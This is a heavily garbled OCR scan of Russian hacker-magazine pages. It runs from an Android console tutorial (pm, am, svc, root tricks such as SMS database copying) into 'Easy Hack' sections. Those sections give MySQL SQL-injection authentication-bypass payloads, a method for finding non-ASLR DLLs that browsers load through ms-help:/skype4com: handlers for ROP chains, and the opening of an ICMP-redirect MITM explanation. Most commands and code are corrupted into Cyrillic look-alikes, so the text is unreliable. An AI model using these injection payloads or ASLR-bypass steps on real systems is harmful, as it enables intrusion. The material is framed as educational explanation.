тренней памяти и $0-карте, используя 4. Доступны также 
стандартные Мпих-инструменты для работы с сетевыми ин- 
терфейсами, такие как Исопйа, пщс?та, па$а{ и Шор (показы- 
вающий используемые интерфейсы и количество прошедшего 
по ним трафика). Удаленные серверы можно попинговать с по- 
мощью стандартного рта, убить приложение — с помощью КИ 
(предварительно посмотрев список запущенных процессов, 
используя команду р$). Особо хотелось бы отметить полез- 
ность команд тсе и гетсе, которые позволяют назначить низ- 
кий приоритет исполнения для особо прожорливых приложе- 
ний. Установим, например, для телефона низкий приоритет 
исполнения: 


$ р$ | егер рпопе 

гаа1о 726 129 539044 40908 ЕЕ <. 
490147830 $ сот. апаго1а.рпопе 

$ геп1се 5 726 


Если ты заметил, что какое-то приложение начинает ве- 
сти себя слишком активно и мешает работе всей системы 
(такую информацию можно получить с помощью любого 
монитора процессов, например ЗуЗет Рапе!), то можно ис- 
пользовать приведенный выше хак по отношению к нему. 
Полный список доступных команд достаточно обширен, его 
можно увидеть так: 


$ 1$ /зузет/Б1п /зуз&ет/хЬ1п 


Кроме стандартных Ипих-команд, о которых можно узнать 
из любого справочника, в Апаго есть несколько своих спе- 
циализированных инструментов. Но, чтобы использовать их, 
придется получить на смартфоне права гоФ\ и, что немаловаж- 
но, перед запуском консоли заставить сервер АБВ перезапу- 
ститься с правами гоо{ с помощью такой команды: 


$ ааб гоо* 


РМИАМ 
Две наиболее важных и полезных Апагоа-команды — это 
рт и ат, имена которых расшифровываются как раскаде 
пападег и аси\Ку тападег. Предназначены они в точности 
для того, о чем говорят их имена, то есть для управления уста- 
новленными пакетами и активностями (запущенными прило- 
жениями). 

рт — это полноценный консольный менеджер пакетов 
по типу линуксовых грт или аерВ. Он имеет простой синтаксис, 


МЕО 


Среди доступных 
команд в Апаго!4 есть 
менеджер бэкапа Бтог, 
но обольщаться не стоит, 
это лишь интерфейс кпо- 
явившемуся в АпОго!а 
2.3 АР! для сторонних 
бэкаперов, таких как 
Сагроп, например. 


АА 


Отдельно от 50К АБВ 
можно получить, 
например, здесь: 


900.9/еда8Н. 
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основанный на командах и передаваемых им опциях (очень 
похоже на ар-9е). С помощью рт можно сделать следую- 
щее: 

1. Просматривать список установленных пакетов: 


$ рт 115% расКавез 


Указав флаг '-$', ты увидишь только системные приложе- 
ния, а флаг '-3" приведет к выводу только сторонних: 


$ рт 115% расКавез -3 


2. Просматривать пути установки пакетов: 


$ рм 115% расКаве$ -+ 


3. Просматривать список разрешений всех приложений: 


$ рт 115% регт1$$510п$ 


4. Просматривать список поддерживаемых смартфоном 
функций (СР$, МЛ-ЕГи прочие): 


$ рт 115% феабигез 


5. Управлять пользователями (пока бессмысленно из-за 
неполной реализации функционала в текущих версиях 
Апаго!а): 


$ рт 115% изег5 
$ рт сгеафе-изег уазуа 
$ рт гетоуе-изег уазуа 


6. Устанавливать и удалять приложения, а также очищать их 
данные: 


$ рт 1п5%а11 /засага/рогпо.арк 
$ рт ип1п$а11 сот.агмеБ 
$ рм с1еаг сот.агмеь 


Есть множество других функций, но они рассчитаны на раз- 
работчиков и нам малоинтересны. 

Но что дает нам рт? Разве нельзя все то же самое сделать 
обычными средствами? Можно, но здесь у нас появляется 
возможность использовать скриптинг. 

Установить все приложения из каталога /засага/арк, да 
так, чтобы они были установлены на карту памяти? Без про- 
блем: 


$ Рог р 1т /засага/арКк/*; до рт 1п$%а11 -$ $р; допе 


Или, может быть, удалить все приложения одним махом? 


$ Рог р 1п `рм 115% расКаве$ -$`; 40 рт «= 
ип1п$%а11 $р; допе 


А может быть, сделать бэкап всех приложений на карту па- 
мяти? Да как за батоном сходить: 


$ ЕТЬЕ$=`рм 115% расКавез$ -+ | сиё -а ':' - 2 | += 
СИЕ -а '=' -+ 1` 
$ Рог + т $РЕТЬЕ$; ао ср $4 /засага/Баскир; аопе 


Оговорюсь, что в этом случае понадобится ВизуВох (можно 
установить из маркета), так как команды сщ в Апагог нет. 

Любую из этих операций можно автоматизировать, поме- 
стив нужные строки в текстовый файл, а затем вызывать его 
одной простой командой: 


$ 5Н /засага/вБаскКчур 


Сделать это будет нетрудно даже на самом смартфоне. 

Теперь о команде ат. Фактически это инструмент для за- 
пуска и остановки приложений, однако настоящая его мощь 
заключается в том, что он позволяет слать приложениям раз- 
личные системные и не очень сообщения. А так как Апагоа 


58 Х-МоБПе 


опирается на сообщения практически во всей своей работе, 

ат превращается в единый инструмент управления ОС. Итак, 

что может ат — пять основных функций: 

1. Запускать приложения. В этом случае надо знать как имя 
приложения, так и имя активности (окна приложения), ко- 
торую ты хочешь активировать. Пара примеров (настройки 
и браузер): 


$ ат зЖагЕ -п сом. апаго1а. зе 1п#5/.5еЕ1п8$ 
$ ат °фагЕ -п сот. апаго1а. 6гомзег/+= 
.Вгом5егАсе1\1у 


А вот еще интересный пример. Запуск номеронабирателя 
с указанным номером (останется только нажать кнопку «зво- 
нок»): 


$ ат $фаг +е1:012-345-6789 


2. Завершать приложения. В этот раз понадобится только 
полное имя пакета (которое можно получить с помощью 


рт): 


$ ат К111 сот.агмеБ 


Чтобы убить все приложения, можно использовать такую 
команду (вот он, простейший таск-киллер): 


$ ат К111-а11 


3. Посылать широковещательные сообщения, которые будут 
приняты всеми приложениями: 


$ ат Бгоааса$* -а апаго1а.1п%еп*.ас*Топ. <> 
АСТТОМ _РОШМЕК _СОММЕСТЕВ 


4. Изменять ОР!. Очень интересная функция, которая позво- 
ляет общесистемно изменить масштаб элементов экрана 
и текста. Например, если стандартный ОР! смартфона со- 
ставляет 320, следующая команда сделает текст и элемен- 
ты более крупными: 


$ ам а15р1ау-Чдепз1%у 400 


А такая — наоборот: 


$ ам а15р1ау-Чдеп$1у 240 


Вернуть все обратно можно так: 


$ ам а415р1ау-Чдеп$1у гезе 


[]1т@1оса1Ро${+ пеш]$ а9Б Ре] рт 1154 расКадез 
раскаде : а1г.сом,91$1гас{1опшаге ‚ Чопт 1оокБаск 
раскасце : ап9го19 

раскаде :БегзегКег ‚ апдго19.арр$ .$$А9го19 
раскКасце : сот. С]1изТег.с]1иВа]апсе 

раскаде : сот.Ое{т1ап{тОеу,5К15атаг1 
раскасде : сот.РГоЕМ 

раскаце : сот. 51и49101'7, Чгашг19ег 

раскаце : сот. ас+1/1$10п.р11Та11 

раскасце : сот. а9добе .Т1азПр1ацег 

раскаде : сот.а1Та1еаЧег .п1ргетегепсе . аст1\/111е$ 
раскаце : сот. ап9дое$ . 1аипспег 

раскаце : сот. апдго14.арр$ .Тад 

раскКаце : сот. апдго19 .БаскирсопТ1/т 

раскасце : сот. апдго19.Б ]1цеТтоотп 

раскКаце : сот. апдго19 .Бгошзег 

раскКаце : сот. апдго19 .са]1си]атог2 

раскаце : сот. апдго19 .са1епдаг 

раскКаце : сот. апдго19 , сег{1пзТа11ег 

раскаце : сот, апдго19 . соптас{$ 

раскаце : сот. апдго19. детсопта1пег 

раскасце : сот. апдго19 .Чезкс]оск 

расКаде : сот. апдго14 .д9геат$ .Баз1с 


МЕО 


Принудительное 
отключение сканера 
медиа (на некоторых 
устройствах он входит 
в бесконечный цикл 
и жрет батарею) вы- 
полняется командой 
«рт 15а е сот.апагога. 
ргомаег$.теб!а/сот. 
апаго!.ргомег$.тесла. 
Мед!а саппегВесемег». 


я 


ШМЕО 


В консоли Апаго!а 
доступна команда для 
тестирования топкеу, 

которая генерирует 
большое количество 
рандомных нажатий 
и жестов. Ее можно ис- 
пользовать для проверки 
самосборных прошивок. 


Просматриваем список 
установленных пакетов 
спомощью рт 
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5. Переключаться между пользователями. Команда рт по- 
зволяет создать нового пользователя, а для переключения 
на него можно использовать ат: 


$ аш зм1ЕсИ-изег 1 


Здесь 1 — Ш пользователя, который выводится на экран 
при его создании. 

Как я уже сказал, наиболее интересная функция ат — это 
возможность посылать широковещательные сообщения, ко- 
торые будут приняты и обработаны всеми приложениями. 
В обычной ситуации такие сообщения отправляет сама систе- 
ма при возникновении определенного события, но мы можем 
обмануть приложения, заставив их думать, что событие дей- 
ствительно произошло, хотя это и не так. В качестве примеров 
можно привести следующие: 

1. Была нажата хардварная кнопка «Камера» (приводит к за- 
пуску камеры): 


$ ат Бгоадса$* -а апаго1а.1пеп*.асТоп . += 
САМЕКА_ВУТТОМ 


2. Смартфон переведен в режим полета (и он действительно 
будет в него переведен): 


$ ат Бгоадса$* -а_апаго1а.1пеп*.асТоп . += 
АТКРЕАМЕ_МООЕ --е7 $Тафе Тгие 


3. Была подключена карта памяти (приводит к запуску скане- 
ра медиа): 


$ ат Бгоадса$* -а апаго1а.1пеп*.ас*Топ . += 
МЕОТА_МОУМТЕО -4 Я1е: ///засага 


Полный список широковещательных сообщений можно 
найти тут: аоо.9/ПА2МИ. Из других интересных применений 
ат можно назвать принудительный перезапуск домашнего 
экрана: 


$ ат зфагЕ -а апаго14.1п%епе. асЕ1оп.МАТМ «> 
-с апаго1а.1п%епт . саевогу .НОМЕ 


И открытие указанной ссылки в браузере: 


$ ат °фагЕ -а апаго14.1п%епе. ас 1оп.\ТЕМ <> 
-п сот. апаго1а.Бгомзег/ .ВгомзегАсЕ1\у1у «= 
' Иер: /=0051е.сот' 


Разумеется, все эти возможности можно использовать 
в скриптах. А сами скрипты можно автоматически запускать 
с помощью ТазкКег, о котором мы уже писали ранее. 

В Апаго есть несколько других команд, которые могут быть 
полезны. Одна из них — $\с, небольшая утилита, которая по- 
зволяет управлять состоянием различных интерфейсов и пита- 
нием системы. С помощью $\с можно сделать следующее: 

1. Включить/выключить \//-[1: 


$ мс м1Н епабБ1Ле 
$ $\мс м18 415аб1е 


2. Включить/выключить передачу данных по мобильным сетям: 


$ °\ус аафа епаб1е 
$ °мс Дафа 415ъаб1е 


3. Включить/выключить отладку по ЧЗВ (АОВ): 


$ °\с изб зефРипсЕ1оп ааБ 


4. Заставить смартфон оставаться включенным при подклю- 
чении к Ч$В-порту/зарядкеЛМ-Е!-сети или всегда: 


ус ромег $фауоп и$Ь 

ус ромег $%ауоп ас 

$\с ромег $ауоп м1ге1ез5 
°ус ромег $Тауоп гие 
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Бэкап приложений нажесткий диск с помощью АВВ 


Га осаАо5ф пены зы ры Удафа/арр 

211: Би 19 то Т11е И. 

2411: ибатагарр/еов.В1аецеевый, тетекатегею-1.арк => „Ио. овуезвый, 1“ 1скзТего0-1.арк 

ри11: ибаТагарргого соси иег р $ 2 Бе ВРУ ст, ЭГО 9 =# вок => ‚Гога -бботе гр о. 2 Бег с. ЭГИЯ 
го19=2.арк 

241]: идафа/арр/ зе. Дау 5оп вот Тазне-2.а0к -> ,Иза.даувоп ви фо азае-2 „вок 

2411]: Ибафаиаро/сов. Като Фарс Воск , ем фегоз ог „ВЕ егу-1 эре =? „Асс. Кало, базе 1о0сК_-ех еп 


ол, Ба егу=1 заре 


011: ИЧатагарр Исса. ви Тиебо  агиаго 6 г не рн, загс =] ‚арк => „сои, а Поитёна . агиагер ГС рие а СН = 
‚вок 

ри11: Убатагаррисот. Козина Юби11а .Баскир=| вре =>? ‚/сом. Кое кбиа -Баскир=| арк 

211: иЗата/гаррисов. Гилепопагоарх „ифеег=| арк =? ‚/соа. Ч муеноглаееарх , уф еыег=1 ‚арЕ 

221]; Идафагарригоб 1. агу.Чазн-1.арЕ -? „.Игоб].вгау. ФазН-1,аре 


21]: иВаЁа’аррУсов. 0009 -алго 4 .арра сбготеформопе-|.аре -> . /соа.д0001е алого 19. арре -сАгове+ 
НАПОСЛЕДОК ПРИВЕДУ НЕСКОЛЬКО ТРЮКОВ, КОТОРЫЕ МОГУТ ПРИГОДИТЬСЯ В РАЗЛИЧНЫХ СИТУАЦИЯХ. 


сопопе 1.эрк 
21]: „батагарргаг сое, 9131г ай погяцаг в . бо] оокьаск =] асе =», Иаг со, ее Боба" в „ли: ] сок 


Баск-1. арк 


Монтирование /зузЗет в режиме записи. По умолчанию файловая $ ср /5асага/тт$т$.А6 $5М$ 
система /зу$ет, содержащая ОС, монтируется в режиме «только $ ср /5асага/соп*ас$.а6 ФСОМТАСТ$ 
$ 
$ 


для чтения», что помешает тебе выполнить трюки, приведенные да- спомп га@1о:гаа1о $$М$ $ФСОМТАСТЗ 

лее, а также многие другие операции. К счастью, исправить ситуа- сИмоа 660 $$М$ $ФСОМТАСТЗ 

цию можно с помощью одной команды: 

Удаление истории поиска. Со временем поисковое окно наполняет- 
ся различным мусором, который Апаго! будет выводить тебе в каче- 
стве подсказок. Чтобы избавиться от него, можно очистить историю 
Вернуть все обратно можно так: поиска: 


$ тоипЕ -о гм, гетоипе /зузет 


$ точит -о го,гетоипЕ /зузет $ гт /дафа/аа{а/ сот. апаго1А . мепа1п: /дафабазе$ /+= 
5ир2е5${1о0п5.аБ 


Удаление системных приложений. Они хранятся в каталоге /зу$ет/ 


арр, поэтому удалить любое из них можно с помощью пт. Например, 
чтобы избавиться от стандартного лаунчера и заменить его на Арех 
Гаипспег, достаточно выполнить две команды: 


$ гм /зуз&ет/арр/Ёаипсйег. арк 
$ ср /дафа/арр/сот.апд4ое$ .1аипсНег*. арк /зузет/арр 


После этого Арех Гаипсйег можно удалить стандартными средства- 
ми системы, а его системная копия останется на месте. 


Бэкап 5М$/ММ$ и контактов. Для хранения данных Апаго, где толь- 
ко возможно, использует базы данных ЗОШе, поэтому сделать бэкап 
нужной информации в большинстве случаев можно, просто скопи- 
ровав нужные файлы баз данных на $О)-карту. Например, бэкап ЗМ$ 
и контактов делается так: 


$ ср /аажа/аафа/сот.апаго1а. ргоу1аег$ .+е1ерпопу/+= 
афабазе$ /тмтзт$.АБ /засага 

$ ср /аажа/ааЕа/сот.апаго1а. ргом1аег$ .сопфас®$/+= 
афабазе$/сопфас®$.а6 /засага 


Восстановление — в обратном порядке: 


$ $М5=/аажа/ааЕа/сот. апаго1а. рго\м1аег$ .+е1ерпопу/= 
Дафабазе$ /тт$т$ . Аб 

$ СОМТАСТ$=/дафа/Чафа/сот. ап4го14 .ргом1аег$ .соп*асЕ$ /== 
Дафтабазе$ /сопфас*$ .аь 


Замена шрифтов. Если тебе не нравятся стандартные шрифты 
Апагога, их можно заменить на любые другие. Для этого следует сде- 
лать бэкап стандартных шрифтов, а затем скопировать на их место 
файл с альтернативным шрифтом (в моем примере он будет лежать 
в файле /засага/ Лот. ЕР: 


$ РОМТ=Ого1а$ап$ // если версия Апаго14 ниже 4.0 

$ РОМТ=ВоБофо // если версия от 4.0 

$ ср -г /зуз&ет/Фоп®5 /засага 

$ Рог + 11 /зуз%ет/Роп*$/${РОМТ}*. ЕР; до ср += 
/засага/Фопе. ЕЕ $+; аопе 


Восстановить стандартные шрифты можно так: 


$ гм -г /зузЕет/ФопЕ$ 
$ ти /5асага/Роп*$ /зуз%ет 
$ симоЯ -г 644 /зузет/Фопе$ 


Завершение работы и перезагрузка. Как и в Ипих, в Апагоа есть 
стандартные команды гебоч{ и зпо1аомт, с помощью которых мож- 
но перезагрузить или отключить устройство. Однако здесь коман- 
да гебоо{ принимает несколько аргументов, с помощью которых 
можно перезагрузить смартфон в консоль восстановления или 
в загрузчик: 


$ гебооЕ гесоуегу 
$ гебоо{ Боо{1оадег 


Рац! З1емепзоп @ Н1сКг.сот 


[]1т@]оса1Ро$+ пеш]$ аЧБ эВе11 1$ -1 /зу5фет/Топ{$ 

-гш-г--/и-- ГОО гоО+ 5116 2008-08-81 18:88 Апаго19С1оск, 11Т 

Егыу-г-=-г=- гоО* гоот 4824 2008-08-81 18:88 Ап9го19С1оск_Н190119Н1. ЕТ 

нгш-и--г--= ГоОт ГоОТ 4824 2088-88-81 18:88 Ап9го19С10оск_50114.11Т 

-гш-г--г-- гоот гоот 448688 2008-98-81 18:88 Апаго19Ето ]1.11Т 

=гш-г--г-- гоО+ гот АТАВ8 2008-88-81 18:88 Ап]а11Меш_1р1-119[1.+1Т 

=гш-г--и-- гоО+ гот 6888 2008-88-01 18:88 С1оскор1а. ТТТ 

-гш-г--г-- гоот гоот 111520 2008-88-81 18:88 Ого19НазКА-Юеди1аг-5узфетИТ, ТТ 

=гш-г--г-- гоО+ гоо1 89456 2008-88-81 18:88 Ого19НазкА-РЮеди1аг . ТТТ 

1Лгшхгихгих гоо+ гоо+ 2013-83-87 28:83 Ого19бапз-Во19.44+{ -> КоБофо-Во19.++1 Это далеко не все возможности консоли Апагоа, однако даже 
1гшхгшхгшх гоот гоот 2013-83-87 28:83 Ого195апз$.11Т -> ЮоБофо-Редци1аг . 11Т 

ЕГи-г--г-= гоо+ гоо+ 13856 2988-88-81 18:88 Ого!абапзВгтептап. +++ они показывают, насколько это гибкая и управляемая система. 
-ги-г--г-- гоо+ ед 123372 2008-08-81 18:08 Ого19бапзОеуападаг!-Веди1аг. +++ Если же ко всему этому еще добавить знания файловых систем 
-гш-г--/и-- ГОО гоО1 227928 2008-88-81 18:88 Ого1Ч5апзЕ|тР1ор1с-Редиу1аг . ТТ : 

-ги-г--г-- гооё = гоо* 4529вал 2088-88-01 18:88 Ого1@бапеРа!1Баск. 111 /ргос и /зу$ Ипих, то можно делать и вовсе замечательные веши, 
=гш-г--г-- гОО1 гоот 21896 2008-88-81 18:88 Ого195апзбеогдтап , 11Т такие как регулировка яркости дисплея, тюнинг системы авто- 
=гш-г--г-- ГоО+ гоО+ 30288 2008-88-81 18:88 Ого195апзНебгеш-Во19,1+Т и я й 
=гш-г--г-- гоО+ гоО1 308024 2008-88-81 18:88 Ого195апзНебгеш-Юедиу1аг . тт ЕКО ВРУ ЗИ ПРИЛОЖЕНИЙ выбор НОО В ЗНИ 
-ги-г--г-- г00+ гоо+ 119388 2008-98-01 18:88 Ого!ЧбапзМопо, +++ ровщика ввода-вывода и разгон процессора. —= 


Просматриваем список системных шрифтов Апагоа 


ЕАЗУ 
НАСК 
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Алексей «Сгееп)од» Тюрин, 
Ого На! Зесийу 
адггг4о9@дтай.сот, 
+миег.сот/атуигт 


У\УАВММС 


Вся информация предо- 
ставлена исключительно 
в ознакомительных целях. 
Ни редакция, ни автор не несут 
ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи. 


ОБОЙТИ АУТЕНТИФИКАЦИЮ ЧЕРЕЗ $0 НА МУЗОЕ 


РЕШЕНИЕ 
Давай представим, что мы ломаем некое веб-приложение с МуЗСЕ как СУБД. 
И к нашей радости находим на первой же странице аутентификации $01- 
инъекцию, с помощью которой можем ее обойти. Но опять-таки там стоит 
фильтр, который частично фильтрует данные... В общем-то, цель задачи — 
показать пару примеров забавных извращений с МуЗСЕ, для развития «пра- 
вильного» мышления, то есть описание здесь для галочки :). 

Так вот, в приложении для проверки пользователя в аутентификации ис- 
пользуется следующая классическая конструкция: 


ЗЕЁЕЕСТ * ЕВОМ +аб1е МНЕВЕ изегпате = '$изег' АМ «= 
раззмога = '$ра55' 


где Физег и $раз$ — данные от пользователя. То есть если пользователь 
с указанным именем и (АМО) паролем существует, то все ОК — пропускай. 

А для того, чтобы обойти аутентификацию, у нас есть пара вариантов. 
Первый — послать в обоих полях «' ОВ 1='1», и тогда мы получим следующую 
логику в ПО: 


$ЕЕЕСТ * ЕВОМ Фаб1е МНЕВЕ ичзегпате = '"' ОВ 1='1' АМО = 
раз$мога = '' ОВ 1='1' 


То есть мы добавляем логики. И к каждой части проверки мы добавляем вы- 
ражение, которое даст положительный результат в любом случае (ог 1=1 — 
всегда гие). 

Второй классический вариант — «' ОВ 1=1 --». Мы выставляем логическое 
выражение только для первой проверки с и5егпате, а остальную часть ком- 
ментируем, чтобы она нам не мешала (АМО раз$\мога = "): 


ЗЕЕЕСТ * ЕКОМ фаб1е МНЕВЕ чзегпате = ''’ ОК 1=1-- АЮО += 
ра$$мог = '' 


Но это и так всем известно. Давай теперь глянем на забавности. 

Вариант 1. Он основывается на фиче сравнения нескольких строк. На- 
пример, выражение «‘ааа’= 'ааа'=‘ааа'» возможно. И данное выражение воз- 
вратит нам {гие. Или, смотри, еще круче: «‘ааа’= 'Б6Б'='ссс"» тоже будет ие! 

Почему? Как так? И где логика? Согласен, странное поведение МуЗОЕ. 
Подумав, что тебе тоже будет интересно, я порыскал в Сети и наткнулся 
на следующее объяснение. 

Предположим, у нас есть выражение «‘ааа’= '666’'='ссс'». МУЗОЕ его 
приводит к виду «(‘ааа’= '666")=‘ссс"». И проводит первое сравнение: ааа — 
это не 66Ь, значит — Та[5е. Хотя, если говорить точнее, это не совсем Та!5е 
(с точки зрения типов), а 0. Что тоже распространенная практика в приве- 
дении типов. 


И теперь мы имеем выражение «0='ссс'», которое по логике должно быть 
опять-таки та|5е. Но вот тут кроется колбаса. 

Так как О — это тип нщедег, а ссс — строка, то МуЗОЕ необходимо при- 
вести последнюю к числовому значению. Но МуЗОЕ приводит (странной 
для меня логикой) «ссс» тоже к нулю, так как считает, что это ближайшее 
числовое значение. В итоге мы имеем сравнение «0=0». Какой же все-таки 
трэш :) 

Таким образом, для обхода аутентификации нам надо вставить в оба поля 
«ааа’'='66б», а с учетом возможности использования пустых строк мы упро- 
щаем до вида «=»: 


ЗЕСЕСТ * ЕКОМ фаб1е МНЕВЕ изегпате = ''='' апа += 


раз$мога = ''= 


Мы получаем два тройных сравнения с пустыми строками, результата- 
ми каждого из которых будет гие. Аутентификация обошлась :). Переходим 
дальше. 

Вариант 2. Атакуем логику: в первое поле вводим «' ог 1=1 ОР "='», во 
второе — «1» (хотя здесь все равно что). В итоге мы получим: 


ЗЕСЕСТ * ЕКОМ Фаб]1е МНЕВЕ ичзегпате = '"' ог 1=1 ОВ ''='' апа = 
раззмога ='1' 


В итоге мы меняем логику выражений за счет добавления дополнитель- 
ного ОВ. И имеем два выражения, соединенных «ОВ»: 
1. «изегтате = "ог 1=1», которое всегда будет гие из-за "1=1"; 
2. «“=" ап раззмога ='1"», которое всегда будет Та[5е из-за некорректности 
пароля. 


Как ты видишь, мы сместили проверку пароля и получим "гие ОВ Табе", 
то есть опять-таки обход аутентификации. Но постой, зачем такое парево? 
Чем этот метод проще классических? Ответ — возможным упрощением. 

Во-первых, от «"="» можно избавиться, оставив пустую строку «"» во вто- 
рой части выражения. На логику это не влияет. А далее меняем «ОВ» на «| |». 
Далее «|| 1=1» на логический эквивалент — «-0» и избавляемся от пробелов, 
так как в новой форме это не навредит. 


В ходе этих преобразований мы доводим все до коротенькой формы. 


В логин вводить надо «-0| |"», в пароль — ту же «1», а в приложении имеем 
следующее: 
ЗЕСЕСТ * ЕВОМ +аб1е МНЕВЕ изегпаме = ' '-0||'' апа + 


раззмога ='1' 


Все, аутентификация за плечами! И чего только люди не напридумывают :). 


Еазу Наск 
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НАЙТИ ОСНОВУ ДЛЯ ОБХОДА АЗЕВ В БРАУЗЕРЕ 


РЕШЕНИЕ 

Написать рабочий эксплойт под современные браузеры совсем не просто, ведь 
приходится иметь дело с различными механизмами безопасности ОС. Два ос- 
новных из них — ОЕР и АЗЁВ. Первый запрещает исполнение кода на страницах 
памяти, не помеченных для выполнения. То есть даже если мы после эксплуа- 
тации уязвимости сможем контролировать ход программы, то в общем случае 
не сможем исполнить наш шелл-код, так как выполнение его будет запрещено 
данной защитой. Обход ее строится на том, что мы можем разрешить выпол- 
нение кода на какой-то странице памяти за счет использования кусочков кода, 
которые уже есть в памяти и разрешены на исполнение, — так называемых ВОР- 
цепочек. 

Второй механизм — Адагез$ Зрасе [ауощ Рапдоттайоп, идея которого 
должна быть понятна из названия. Это рандомизация адресного пространства 
процессов, то есть расположение стека, хипа, библиотек при каждой переза- 
грузке ОС будет для процесса различным. 

И эти два механизма рождают приличную проблему для нас. Для обхода 
ОЕР мы должны указывать точные адреса ВОР-кусочков, но с АЗЁВ они нам ста- 
новятся неизвестны. Как же обойти такую защиту? Один из вариантов, который 
часто используется против браузеров, — не обходить защиту. Сейчас поясню 
это парадоксальное суждение :). 

У АЗЁВ и ПЕР есть проблема. Приложение должно быть скомпилировано 
с этими механизмами защиты, включая его библиотеки. И два-три года на- 
зад были сложности с внедрением защиты в сторонних приложениях. Та же 
Чама 1.6 с ее широким распространением в браузерах была прекрасной 
«дыркой» для обхода АЗЕВ, так как ее библиотеки не поддерживали АЗЕВ. 

Но то время вроде бы прошло. уама 1.7 — полностью АЗЁР’на, как и многие 
другие распространенные приложения. Что же делать? Искать дальше :). 

Если точнее, то Парвез Анвар (Рагуе7 Ап\мгаг) уже сделал за нас все, что нуж- 
но. Ему за это благодарность. Он написал неболыцую тулзенку (ч00.91/м\5М), 
которая смотрит в библиотеках, скомпилированы ли они с АЗЕВ, за счет провер- 
ки флага 1МАСЕ_ОТЕСНАВАСТЕН!$Т!С$ ОУМАМ!С ВАЗЕ в заголовках файла. 

Итак, все, что нам надо, — это выполнить такую последовательность дей- 
СТВИЙ В КОНСОЛИ: 


ть гс. ЧЩ АЕ БЕ 
2. аз1гсИК.ехе -1 911 м1п7$р1.Ехе 1 > 4911 115 попа$1г. хе 


3. Ниа$ег /1 /м /с:"с1$14 =" /ф: а11 11$ попа$1е. хе += 
>с1$14$. хе 


1. Создаем список (а! 1$.) всех библиотек на диске С:. Параметр /6 — 
только выводить имена файлов (без дополнительной информации). Пара- 
метр /$ — выводить полные пути. 

2. Проверяем полученный список (-!) с помощью тулзы Парвеза азгсик. Вы- 
вод («1») только неАЗЁЕВ’ных библиотек. 

3. Делаем поиск без учета регистра (/1) строки "с! =" (параметр /с:) по спи- 
ску, что был найден ранее. /л — вывод только файлов, где есть совпадение. 


То есть на последнем шаге мы просто смотрим бинарнички на строчку и вы- 
являем, какие из них потенциально Асй\еХ’ные и могут ли быть эти библиоте- 
ки вызваны из браузера. Здесь важно отметить, что это общий алгоритм. Есть 
много тонкостей. Во-первых, кроме ОШек, можно еще поискать и другие рас- 
ширения. Например, АсйуеХ’ные — осх. Во-вторых, опять-таки, если это какой- 
то Асй\уех-компонент без поддержки АЗЕВ, это еще не повод радоваться. Ведь 
укомпонентов есть различные настройки безопасности (За!е Рог Зсйрипоа, За е 


бт 


Ипа он=^Донп 10адей Рьочкайп Е11ес але =.411]1 „Ь „$ 2 с:\бетр\. 4115.6 хЕ 


И 1пдоч^Фочп Т1оадей Рьочкая Р1]1ез алк =.911 /Ъ #5 
У пд оч “Шоп 10а4е@ Рьоуеам Р11е5“СкурбоСЕк1.411 
поз —боинп 0 а4е@ Рьочраг Р11е5“`Чер10у.911 


т то Чо Пол а фе Ресчная ЕР11е5\ехбепден. 11 
талон“ Понт 10а фе Реочкая 211 ВкорЕНИ. 411 
пон“ Понт ТоаеЯ Рвочкая 211 [Феор НИЗ .911 
с = типо =^.Вомп 1оафеЯ Рьоская 211 пезрео .911 

ет лид ониея > Плонынл ооьаьфе О Руечсосьаия Рт1е=“лезркеоах. 411 


Ищем библиотеки 


с: Итпа она: Поп 1оафей Реоукат уни ае ес НЕ.ехе -1 с:-\6етр\ а 115 .ЕхЕ 1 


1] Тоа фату Ре с: Еепр“ 9115. ЕЕ „ Я Е11епапес ]оафей 
Оо 1ол0ей Регоукат Ро] 
‚И Ргочеаг Е1 
Реочкат 
Реоукат 
Реодкат 
Реоцкат 


Ар 1оу. 1] х 


Б поп ЯЪЬН Е11е 


= Ашодеск 1-Огор Сопелег 


гогоеРегпоме 121Е0 
ь 


Используя Ппа$1г, ищем вот эти строки 


Рог п® и другие), которые могут нас обломать. В-третьих, «подцепить» библио- 
теку можно и косвенно (см. далее). 

На самом деле Парвез Анвар, посканив различные системы, на- 
шел несколько достаточно универсальных способов. Хотя в чистой \М/т7 
$Р1 не было найдено таких библиотек, мы-то знаем, что «чистых» систем 
ине бывает. 

Первый вариант — если в системе установлен ОШсе 2007/2010. Да-да, 
продукт от М$. Имя библиотеки без АЗЁЕАВ — Пха$.а1. А все, что необходимо 
для того, чтобы она была подгружена, — использовать зарегистрированный 
хендлер тз-пар: 


<5СВТРТ Тапвиаве=" Зауа$сг1 ре" > 
ЛосаЕ1оп.ПгефР = 'тз-Пе]1р:" 
</ЭСВТРТ» 


Одна строчка, библиотека подгружается, и мы можем использовать ВОР- 
цепочку для обхода ПЕР из этой ОШ ки. 

Второй вариант почти аналогичный. Но софт, который будем юзать, воз- 
можно, даже более распространен — ЗКуре. Его библиотека зкуре4сот.аЙтак- 
же безАЗЁВ’ная. Для погрузки используется такой же «тихий» способ, с при- 
менением хендлера экуре4сот:. 

Вот так вот, все достаточно просто. Кстати, в том же блоге (чоо.а/ЕМивВС) 
можно найти пример выборки подходящего метода, а также ВОР-цепочки 
для каждой из библиотек. 


ОРГАНИЗОВАТЬ МИТМ, ИСПОЛЬЗУЯ 1СМР ВЕБВЕСТ 


РЕШЕНИЕ 
Итак, напомню. МИМ (тап-т-Ше-тюе) — общее название 
для типа атак, когда хакер получает возможность манипулиро- 
вать трафиком, передаваемым между двумя хостами. Самая 
классика — это АВР розопта и ОМ№$ зроойпд. Хотя ясное дело: 
и разных протоколов много, итехнологий, а потому методов есть 
еще целый пучок. С парочкой из них мы сейчас и познакомимся. 
Первый метод — 1СМР геднес{. Эта техника основана 
не на какой-то баге, а на вполне декларированной фиче про- 


прописан дефолтный путь — через В1. Таким образом, ког- 
да хост А пошлет пакет данных хосту В, он пошлет их через 
АВ1. АТ, в свою очередь, получив этот пакет данных, посмо- 
трит таблицу маршрутизации и увидит, что для того, чтобы 


токола. Но давай обо всем по порядку — сначала общая Рис. 1. 
теория. Зачем 
Давай представим ситуацию. У нас есть хост А и В, нужен 
а также роутеры В1 иН2 (см. рис. 1). С хоста А данные надо |СМР 
послать на хост В, а на хосте А в таблице маршрутизации геЧтес+ 


62 Взлом 
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переслать данные на хост В, он должен отпра- 


'00 01 02 0304 05 0607 08 0910 11 12 1314 15 16]17 18 1920 21 22|23 24 25 2627 28 29 30 31 
